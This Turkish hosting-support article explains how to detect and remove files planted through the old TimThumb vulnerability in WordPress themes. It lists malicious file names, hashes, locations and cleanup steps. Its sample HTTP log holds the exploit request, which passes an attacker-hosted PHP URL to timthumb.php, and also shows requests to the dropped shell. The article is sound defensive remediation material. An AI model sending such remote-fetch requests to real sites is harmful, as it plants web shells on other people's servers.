WordPress Gizlilik Açığı: TimThumb

TimThumb, resimleri yeniden boyutlandırmak için WordPress temaları ve eklentileri tarafından kullanılan bir araçtır. TimThumb’ın eski sürümlerinde, saldırganların başka bir web sitesinden kötü amaçlı ("zararlı") dosyalar yüklemesine olanak tanıyan bir güvenlik açığı vardır. İlk zararlı dosya sayesinde saldırgan hosting hesabına daha fazla kötü amaçlı dosya yükleyebilir.

Gizlilik açıkları ve bunlarla nasıl başa çıkabileceğinize ilişkin daha fazla bilgiyi Web sitem saldırıya uğrarsa ne olur? adlı makalede bulabilirsiniz.

Gizliliğinizin İhlal Edildiğini Gösteren İşaretler

Web sitem saldırıya uğrarsa ne olur? adlı makalede bahsedilen işaretlerin yanı sıra hesabınız bir eklenti dizininde aşağıdaki düzenlere sahip dosyalar içeriyorsa sitenizin bu gizlilik açığından etkilendiğini anlayabilirsiniz:

  • external_[md5 hash].php — örneğin: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — örneğin: 7eebe45bde5168488ac4010f0d65cea8.php

Olası md5 karmalarını bu makalenin Bilinen Kötü Amaçlı Dosyaların MD5 Toplamı bölümünde bulabilirsiniz.

Ayrıca web sitenizin kök dizininde şu dosyaları da bulabilirsiniz (daha fazla bilgi):

  • x.txt
  • logx.txt

Çözümler

Gizliliği ihlal edilmiş ve zararlı dosyaların tümünü kaldırmanız gerekir. Herhangi bir şeyi silmeden önce web sitenizin yedeğini oluşturmanızı öneririz (daha fazla bilgi).

Zararlı Dosyaları Bulma

İlk olarak TimThumb güvenlik açığından yararlanılarak yüklenen zararlı dosyalar genellikle güvenlik açığı bulunan TimThumb dosyasını içeren /theme veya /plugin dizinindeki şu dizinlerden birinde bulunur.

  • /tmp
  • /cache
  • /images

Örnek zararlı dosya konumları:

[webroot]/wp-content/themes/[güvenlik açığı bulunan TimThumb teması]/cache/images/

Bu konumlardaki örnek zararlı dosya adları:

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

x.txt ve logx.txt dosyaları, TimThumb güvenlik açığından yararlanılarak zararlı bir dosyanın ne zaman oluşturulduğu ve zararlı dosyanın hosting hesabındaki konumu hakkında bilgiler içerir. Bu bilgiler hangi dosyaların kaldırılması gerektiğini ve bunların nerede bulunabileceğini belirlemek için faydalıdır. Ancak kaldırılması gereken dosyaların tam bir listesini sağlamazlar.

Örnek:

Day : Thu, 11 Apr 2013 06:21:15 -0700
IP: X.X.X.X
Tarayıcı: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Url: /wp-content/themes/[güvenlik açığı olan TimThumb’ı içeren tema]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

Kaldırılacak Dosyalar

Sitenizin yedeğini oluşturduktan sonra şu dosyaları kaldırın:

  • x.txt
  • logx.txt
  • external_[md5 hash].php — örneğin: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — örneğin: 7eebe45bde5168488ac4010f0d65cea8.php
  • md5 karma adlı dosyalarla birlikte bulunan diğer kötü amaçlı PHP dosyaları.

Bunu FTP (daha fazla bilgi) veya hosting hesabınızın kontrol panelindeki dosya yöneticisi üzerinden (daha fazla bilgi) gerçekleştirebilirsiniz.

Ayrıca şunları da yapmanız gerekir:

  • Tüm tema ve eklentilerinizi en yeni sürüme güncelleyin.
  • Tüm TimThumb.php örneklerini burada bulunan en yeni sürümle değiştirin.

Teknik Bilgiler

HTTP Günlükleri Örneği

x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[güvenlik açığı bulunan TimThumb’ı içeren tema]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[güvenlik açığı bulunan TimThumb’ı içeren tema]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[güvenlik açığı bulunan TimThumb’ı içeren tema]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[güvenlik açığı bulunan TimThumb’ı içeren tema]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

Bilinen Kötü Amaçlı Dosyaların MD5 Toplamı

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

Diğer Kötü Amaçlı Dosyalar

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

Bu Makale Yardımcı Oldu mu?
Geri bildiriminiz için teşekkür ederiz. Müşteri hizmetleri temsilcisiyle görüşmek için lütfen destek telefon numarasını veya yukarıdaki sohbet seçeneğini kullanın.
Yardımcı olabildiysek ne mutlu bize! Sizin için yapabileceğimiz başka bir şey var mı?
Bunun için üzgünüz. Kafanızı neyin karıştırdığını veya çözümün problemi neden gidermediğini bize belirtin.